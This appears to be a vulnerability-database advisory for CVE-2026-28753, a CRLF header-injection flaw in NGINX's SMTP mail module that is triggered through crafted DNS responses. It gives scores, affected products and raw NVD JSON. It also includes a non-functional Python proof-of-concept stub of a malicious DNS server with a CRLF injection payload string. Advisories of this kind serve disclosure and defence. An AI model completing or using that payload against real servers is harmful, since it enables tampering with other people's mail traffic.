Security Vulnerability Report
CVE-2026-28753 CVSS 3.7 LOW

CVE-2026-28753

Published: 2026-03-24 15:16:34
Last Modified: 2026-03-26 21:15:24

Description

NGINX Plus and NGINX Open Source have a vulnerability in the ngx_mail_smtp_module module due to the improper handling of CRLF sequences in DNS responses. This allows an attacker-controlled DNS server to inject arbitrary headers into SMTP upstream requests, leading to potential request manipulation. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:f5:nginx_plus:r32:p1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:nginx_plus:r32:p2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:nginx_plus:r32:p3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:nginx_plus:r32:p4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:nginx_plus:r33:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:nginx_open_source:*:*:*:*:*:*:*:* - VULNERABLE
NGINX Open Source (see the vendor advisory for the specific affected versions)
NGINX Plus (see the vendor advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Conceptual PoC for CVE-2026-28753
# This script simulates a malicious DNS server that responds with
# a payload containing CRLF sequences to exploit the vulnerability.

# Malicious payload with CRLF injection
injected_headers = "\r\nX-Injected-Header: Attacker-Controlled\r\n"


def start_dns_server():
    # Create a UDP socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", 53))
    print("[+] Malicious DNS server listening on port 53...")
    try:
        while True:
            data, addr = sock.recvfrom(1024)
            print(f"[+] Received query from {addr}")
            # In a real exploit, the attacker would craft a valid DNS response
            # where the domain name or TXT record contains the CRLF sequence.
            # Below is a simplified representation of the logic.
            # Constructing a malicious response (Conceptual)
            # The vulnerability triggers when NGINX parses the response.
            # response_payload += injected_headers
            # Send response (Actual DNS crafting required for execution)
            # sock.sendto(response_payload, addr)
            pass
    except KeyboardInterrupt:
        sock.close()


if __name__ == "__main__":
    start_dns_server()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28753", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:33.560", "lastModified": "2026-03-26T21:15:24.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NGINX Plus and NGINX Open Source have a vulnerability in the ngx_mail_smtp_module module due to the improper handling of CRLF sequences in DNS responses. This allows an attacker-controlled DNS server to inject arbitrary headers into SMTP upstream requests, leading to potential request manipulation. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}, {"lang": "es", "value": "NGINX Plus y NGINX Open Source tienen una vulnerabilidad en el módulo ngx_mail_smtp_module debido al manejo inadecuado de secuencias CRLF en las respuestas DNS. Esto permite a un servidor DNS controlado por el atacante inyectar encabezados arbitrarios en las solicitudes upstream SMTP, lo que lleva a una posible manipulación de solicitudes. 
Nota: Las versiones de software que han alcanzado el Fin de Soporte Técnico (EoTS) no son evaluadas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": 
"UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p1:*:*:*:*:*:*", "matchCriteriaId": "FA913184-EAAD-409E-99C6-AB979DAA93F3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p2:*:*:*:*:*:*", "matchCriteriaId": "782DF180-1101-4D6A-A1D7-8DADBAF6D9D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p3:*:*:*:*:*:*", "matchCriteriaId": "FB0B11F2-4748-492B-9906-F8C4C5EAFF12"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p4:*:*:*:*:*:*", "matchCriteriaId": "86B53968-1CCA-4CF3-8454-BB92EF64D10E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:*:*:*:*:*:*:*", "matchCriteriaId": "4F58BD02-EA76-4F32-87D6-430026C8553E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:p1:*:*:*:*:*:*", "matchCriteriaId": "46DC49B8-7286-4867-9CDA-1C1B469CD304"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:p2:*:*:*:*:*:*", "matchCriteriaId": "43477C2E-7485-4146-B25C-F58D632CD85B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:p3:*:*:*:*:*:*", "matchCriteriaId": "6A25B9CF-02C0-42DE-9C70-F2AD3ACE3CEB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r34:*:*:*:*:*:*:*", "matchCriteriaId": "86358605-55F9-4F6F-846A-3F48738F6E05"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r34:p1:*:*:*:*:*:*", "matchCriteriaId": "7453D683-FCA7-46EE-BE49-5FD9A01D7F87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r34:p2:*:*:*:*:*:*", "matchCriteriaId": "A977BF9F-D165-4B93-B4D2-A177883A5E75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r35:*:*:*:*:*:*:*", "matchCriteriaId": 
"C643CEF2-F421-4E2C-AD39-51CE820F2238"}, {"vul ... (truncated)